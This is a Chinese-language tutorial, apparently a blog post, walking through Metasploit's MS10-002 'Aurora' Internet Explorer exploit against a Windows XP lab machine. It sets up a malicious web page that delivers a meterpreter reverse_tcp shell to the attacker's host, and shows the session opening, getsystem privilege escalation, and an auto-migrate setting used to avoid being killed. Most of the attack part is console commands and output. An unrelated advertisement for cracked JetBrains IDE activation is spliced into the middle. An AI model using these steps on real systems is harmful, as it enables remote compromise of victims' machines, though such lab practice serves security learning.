ms10_002渗透步骤——MSF搭建钓鱼网站[亲测有效]-极光系统安全吗

ms10_002（极光漏洞）渗透步骤——MSF搭建钓鱼网站[亲测有效]本文简单介绍了如何使用metasploit针对ms10_002（极光漏洞）进行渗透测试，仅供学习测试环境描述ip主机kali2020192.168.1.113目标主机winxpsp3192.168.1.106①启动msf，搜索ms10_002，使用msf中的exploit攻击模块，设置参数msf6>searchms10_002MatchingModules================#Name.

目录

一、MS10_002极光漏洞 二、高级属性

一、MS10_002极光漏洞

---

本文简单介绍了如何使用metasploit针对ms10_002（极光漏洞）进行渗透测试，仅供学习

测试环境	描述	ip
主机	kali2020	192.168.1.113
目标主机	win xp sp3	192.168.1.106

①启动msf，搜索ms10_002，使用msf中的exploit攻击模块，设置参数

msf6 > search ms10_002Matching Modules================# Name Disclosure Date Rank Check Description-  ----                                        ---------------  ----    -----  -----------0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-FreeInteract with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_objectmsf6 > use 0[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > optionsModule options (exploit/windows/browser/ms10_002_aurora):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT  8080             yes       The local port to listen on.SSL      false            no        Negotiate SSL for incoming connectionsSSLCert                   no        Path to a custom SSL certificate (default is randomly generated)URIPATH                   no        The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.1.113    yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Automaticmsf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80srvport => 80msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443lport => 443msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /uripath => /msf6 exploit(windows/browser/ms10_002_aurora) > exploit[*] Exploit running as background job 1.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.1.113:443 [*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.113:80/msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.

是否还在为Ide开发工具频繁失效而烦恼，来吧关注以下公众号获取最新激活方式。亲测可用！

为防止网络爬虫，请关注公众号回复”口令”

激活idea 激活CLion DataGrip DataSpell dotCover dotMemory dotTrace GoLand PhpStorm PyCharm ReSharper ReShaC++ Rider RubyMine WebStorm 全家桶 解锁下载刷新

【正版授权，激活自己账号】：Jetbrains全家桶Ide使用，1年售后保障，每天仅需1毛

【官方授权 正版激活】：官方授权 正版激活 自己使用，支持Jetbrains家族下所有IDE…

②提示已经在本机80端口开启钓鱼网站，打开靶机的浏览器输入192.168.1.106

③主机成功渗透靶机，获取meterpreter权限

msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption[*] Sending stage (175174 bytes) to 192.168.1.106[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800msf6 exploit(windows/browser/ms10_002_aurora) > sessionsActive sessions===============Id  Name  Type                     Information             Connection--  ----  ----                     -----------             ----------1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.106)msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1[*] Starting interaction with 1...meterpreter > getuidServer username: WINXP-1\st21meterpreter > getsystem...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > 

---

二、高级属性

使用advanced查看高级属性

msf6 exploit(windows/browser/ms10_002_aurora) > advancedModule advanced options (exploit/windows/browser/ms10_002_aurora):Name                    Current Setting  Required  Description----                    ---------------  --------  -----------ContextInformationFile                   no        The information file that contains context informationDisablePayloadHandler   false            no        Disable the handler code for the selected payloadEnableContextEncoding   false            no        Use transient context when encoding payloadsListenerComm                             no        The specific communication channel to use for this serviceSSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"SSLCompression          false            no        Enable SSL/TLS-level compressionSendRobots              false            no        Return a robots.txt file if asked for oneURIHOST                                  no        Host to use in URI (useful for tunnels)URIPORT                                  no        Port to use in URI (useful for tunnels)VERBOSE                 false            no        Enable detailed status messagesWORKSPACE                                no        Specify the workspace for this modulePayload advanced options (windows/meterpreter/reverse_tcp):Name                         Current Setting  Required  Description----                         ---------------  --------  -----------AutoLoadStdapi               true             yes       Automatically load the Stdapi extensionAutoRunScript                                 no        A script to run automatically on session creation.AutoSystemInfo               true             yes       Automatically capture system information on initialization.AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the processAutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in secondsEnableStageEncoding          false            no        Encode the second stage payloadEnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimalHandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored forHTTP transportsInitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.PayloadProcessCommandLine                     no        The displayed command line that will be used by the payloadPayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUIDPayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDsPingbackRetries              0                yes       How many additional successful pingbacksPingbackSleep                30               yes       Time (in seconds) to sleep between pingbacksPrependMigrate               false            yes       Spawns and runs shellcode in new processPrependMigrateProc                            no        Process to spawn and run shellcode inReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOSTReverseListenerBindAddress                    no        The specific IP address to bind to on the local systemReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORTReverseListenerComm                           no        The specific communication channel to use for this listenerReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killedSessionExpirationTimeout     604800           no        The number of seconds before this session should be forciblyshut downSessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failureSessionRetryWait             10               no        Number of seconds to wait between reconnect attemptsStageEncoder                                  no        Encoder to use if EnableStageEncoding is setStageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is setStageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatibleStagerRetryCount             10               no        The number of times the stager should retry if the first connect failsStagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attemptsVERBOSE                      false            no        Enable detailed status messagesWORKSPACE                                     no        Specify the workspace for this module

例如，在连接到目标电脑后迅速迁移到其他进程，防止被杀：

msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -fautorunscript => migrate -f